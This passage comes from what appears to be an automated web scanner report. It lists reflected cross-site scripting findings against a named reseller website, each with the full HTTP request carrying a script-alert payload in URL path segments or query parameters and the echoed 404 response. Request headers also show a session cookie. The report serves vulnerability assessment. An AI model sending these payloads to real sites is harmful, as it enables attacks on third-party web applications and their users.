<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20e30db<script>alert(1)</script>fd0a187a4e1/themes/kosmos/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.1694. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/5.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 44c0f<script>alert(1)</script>69bd448ba0c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes44c0f<script>alert(1)</script>69bd448ba0c/kosmos/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:29:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes44c0f<script>alert(1)</script>69bd448ba0c/kosmos/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.1695. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/5.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7a42d<script>alert(1)</script>2c66a6dc630 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos7a42d<script>alert(1)</script>2c66a6dc630/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:29:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos7a42d<script>alert(1)</script>2c66a6dc630/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.1696. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/5.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload aa6ee<script>alert(1)</script>9567d32e396 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/imagesaa6ee<script>alert(1)</script>9567d32e396/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/imagesaa6ee<script>alert(1)</script>9567d32e396/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.1697. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/5.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload caf00<script>alert(1)</script>e978a4395b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/images/ratingcaf00<script>alert(1)</script>e978a4395b/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/ratingcaf00<script>alert(1)</script>e978a4395b/5.gif was not found on this server.</p>
...[SNIP]...

2.1698. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/5.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 872bc<script>alert(1)</script>4770be2be7e was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/images/rating/5.gif872bc<script>alert(1)</script>4770be2be7e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/rating/5.gif872bc<script>alert(1)</script>4770be2be7e was not found on this server.</p>
...[SNIP]...

2.1699. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/5.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/rating/5.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 61727<script>alert(1)</script>e97bc4552d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/images/rating/5.gif?61727<script>alert(1)</script>e97bc4552d4=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:28:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/rating/5.gif?61727<script>alert(1)</script>e97bc4552d4=1 was not found on this server.</p>
...[SNIP]...

2.1700. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aa86f<script>alert(1)</script>143dc944661 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailaa86f<script>alert(1)</script>143dc944661/20/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailaa86f<script>alert(1)</script>143dc944661/20/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1701. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d496d<script>alert(1)</script>005c10f26ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20d496d<script>alert(1)</script>005c10f26ab/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20d496d<script>alert(1)</script>005c10f26ab/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1702. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dc21a<script>alert(1)</script>fd7a5bd5661 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themesdc21a<script>alert(1)</script>fd7a5bd5661/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themesdc21a<script>alert(1)</script>fd7a5bd5661/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1703. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cb056<script>alert(1)</script>9883e25e458 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmoscb056<script>alert(1)</script>9883e25e458/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmoscb056<script>alert(1)</script>9883e25e458/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1704. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 64a38<script>alert(1)</script>c119903dc2d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/images64a38<script>alert(1)</script>c119903dc2d/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images64a38<script>alert(1)</script>c119903dc2d/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1705. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 3e840<script>alert(1)</script>fac9ebecdd2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/images/rating3e840<script>alert(1)</script>fac9ebecdd2/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/rating3e840<script>alert(1)</script>fac9ebecdd2/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1706. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload ffb89<script>alert(1)</script>bb22087ce74 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/images/rating/search.phpffb89<script>alert(1)</script>bb22087ce74?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/rating/search.phpffb89<script>alert(1)</script>bb22087ce74?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1707. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload ff7e3<a>b9984c2973e was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/20/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchff7e3<a>b9984c2973e&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchff7e3<a>b9984c2973e&opt=2 was not found on this server.</p>
...[SNIP]...

2.1708. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload ef585<a>af1e837c1c was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/20/themes/kosmos/images/rating/search.php?keyword=search...ef585<a>af1e837c1c&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/rating/search.php?keyword=search...ef585<a>af1e837c1c&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1709. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 67007<script>alert(1)</script>19f8400091e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&67007<script>alert(1)</script>19f8400091e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&67007<script>alert(1)</script>19f8400091e=1 was not found on this server.</p>
...[SNIP]...

2.1710. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload cd447<a>d306b4a9eb8 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/20/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2cd447<a>d306b4a9eb8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2cd447<a>d306b4a9eb8 was not found on this server.</p>
...[SNIP]...

2.1711. http://www.resellerbase.com/detail/20/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 381a5<script>alert(1)</script>8c95f396ba3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail381a5<script>alert(1)</script>8c95f396ba3/20/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
